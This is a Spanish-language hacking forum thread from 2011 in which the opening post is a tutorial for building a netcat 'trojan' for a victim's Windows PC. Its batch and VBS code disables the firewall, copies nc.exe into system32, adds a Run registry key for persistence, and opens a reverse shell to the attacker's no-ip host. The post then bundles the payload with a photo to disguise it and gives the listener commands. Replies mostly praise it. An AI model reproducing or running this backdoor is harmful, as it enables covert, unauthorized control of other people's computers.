comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[TUTORIAL] Netcat Troyano by July

  • 4 Respuestas
  • 3086 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado july

  • *
  • Underc0der
  • Mensajes: 32
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Agosto 30, 2011, 12:45:49 pm »
Te explico un poco:

Reverse shell

Es cuando la victima se conecta a vos y te da una shell. El no-ip lo que hace redirigir tu ip dinamica a una direccion dns (yo lo tengo cada 3 segundos)  esto hace que por mas que tu ip cambie, siempre se va asociar a tu dns (ej loquesea.no-ip.org) ya explicado esto que hacemos con el netcat hacemos un bat con el nombre vamos.bat

Y le ponemos estos comandos:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
nc.exe
hay que copiarselo a la victima en

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
copy C:\Extracted\nc.exe C:\WINDOWS\system32\nc.exe
ademas a este bat ponerlo en el registro run, para que?

para que cada vez que se prenda la maquina me lo ejecute

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
start C:\Extracted\data.exe
Ademas hice un vbs para desabilitar el friweall de windows, que es el siguiente codigo:

Código: Text
  1. Set objFirewall = CreateObject("HNetCfg.FwMgr")
  2.   Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
  3.  
  4.   objPolicy.FirewallEnabled = false

Esto lo guardamos como  desa.vbs tambien en el bat lo hacemos ejecutar

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
start C:\Extracted\desa.vbs
lo unico que falta poner el comando para conectarnos

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
nc loquesea.no-ip.org 80 | cmd.exe | nc loquesea.no-ip.org 443

bueno el bat quedaria asi:

Código: Text
  1. @echo off
  2. start C:\Extracted\desa.vbs
  3. copy C:\Extracted\nc.exe C:\WINDOWS\system32\nc.exe
  4. reg add hklm\software\microsoft\windows\currentversion\run /v wind /t reg_sz /d C:\Extracted\vamos.exe /f
  5. nc loquesea.no-ip.org 80 | cmd.exe | nc loquesea.no-ip.org 443

y el desa.vbs quedaria asi:

 
Código: Text
  1. Set objFirewall = CreateObject("HNetCfg.FwMgr")
  2.   Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
  3.  
  4.   objPolicy.FirewallEnabled = false

Ahora despues que tenes eso,  al bat lo pasamos a exe con Bat To Exe Converter.exe luego unimos todo (nc.exe, desa.vbs, vamos.exe)  al unirlo todo ponemos la foto, el vamos.exe y luego lo demas (hay que respetar el orden) yo uso el programa SFX COMPILER

terminando, en tu maquina pones en un bat :

Código: Text
  1. nc -vv -l -p 80

en otro bat

Código: Text
  1. nc -vv -l -p 443

ejecutas los dos y esperas la coneccion  antes desabilita tu firewall.

Si lo queres probar antes, en una red local o en una maquina virtual (virtual box) es de la siguiente forma:


en la computadora victima copiar nc.exe en sytem32, luego hacer un bat con el siguiente codigo:

Código: Text
  1. nc  ip de tu maquina local 80 | cmd.exe | nc ip de tu maquina local 443

para colocar "|" precional alt + ctrl + 1


Ahora en nuestra maquina desconectar el firewall de windows luego realizar 2 bat y los mismo colocar un comando:

este es 1

Código: Text
  1. nc -vv -l -p 80

este es 2

Código: Text
  1. nc -vv -l -p 443

OJO: PRIMERO EJECUTA ESTOS 2 BAT PARA QUE QUEDEN ESCUCHANDO, Y LUEGO EL COMANDO EN LA VICTIMA.



ESPERO QUE LO ENTIENDAS
« Última modificación: Agosto 30, 2011, 02:29:44 pm por Snifer »

Desconectado opcraz

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #1 en: Agosto 30, 2011, 01:59:23 pm »
 Copiado... ingresado al kernel del coco (cabeza) ;D

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #2 en: Agosto 30, 2011, 02:30:48 pm »
 July Edite el post para que quede mas vistoso y elegante, en otra tabula bien para que quede mejor el tutorial..

Gracias por aportar..

Saludos :P
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado k43l

  • *
  • Underc0der
  • Mensajes: 119
  • Actividad:
    0%
  • Reputación 0
  • white & black hacking
    • Ver Perfil
    • White And Black Hacking
« Respuesta #3 en: Agosto 30, 2011, 03:46:50 pm »
buen aporte, lastima que la navaja suiza ya sea detectado por muchos antivirus.
salu2




"Mess with the best, die like the rest"

Desconectado july

  • *
  • Underc0der
  • Mensajes: 32
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Agosto 30, 2011, 08:53:17 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Copiado... ingresado al kernel del coco (cabeza) ;D

que decis?



No tienes permisos para ver links. Registrate o Entra con tu cuenta
July Edite el post para que quede mas vistoso y elegante, en otra tabula bien para que quede mejor el tutorial..

Gracias por aportar..

Saludos :P

gracias por arreglarlo bro

PD: No hagas doble post!! Editalo el mensaje Saludos

Atte:Snifer

« Última modificación: Agosto 30, 2011, 09:11:05 pm por Snifer »

 

¿Te gustó el post? COMPARTILO!



Tutorial - "Recuperar datos borrados dispositivo almacenamiento"

Iniciado por Cl0udswX

Respuestas: 7
Vistas: 4243
Último mensaje Octubre 22, 2017, 04:27:09 pm
por b4r7
Breve Tutorial Sobre Ingenieria Social + Algunos Ejemplos

Iniciado por Krau[Z]ereth

Respuestas: 2
Vistas: 5129
Último mensaje Junio 28, 2012, 04:04:06 am
por aura16
Super tutorial de comandos MS-DOS(primera parte) by k43l

Iniciado por k43l

Respuestas: 6
Vistas: 4468
Último mensaje Abril 07, 2010, 09:35:17 pm
por k43l
Utilizando BeEF-XSS Framework-Tutorial Español - Backtrack 5 R3

Iniciado por Aryenal.Bt

Respuestas: 2
Vistas: 4715
Último mensaje Febrero 02, 2013, 09:02:37 pm
por Aryenal.Bt
Super tutorial de comandos MS-DOS(segunda parte) by k43l

Iniciado por k43l

Respuestas: 2
Vistas: 2689
Último mensaje Abril 06, 2010, 10:56:34 am
por k43l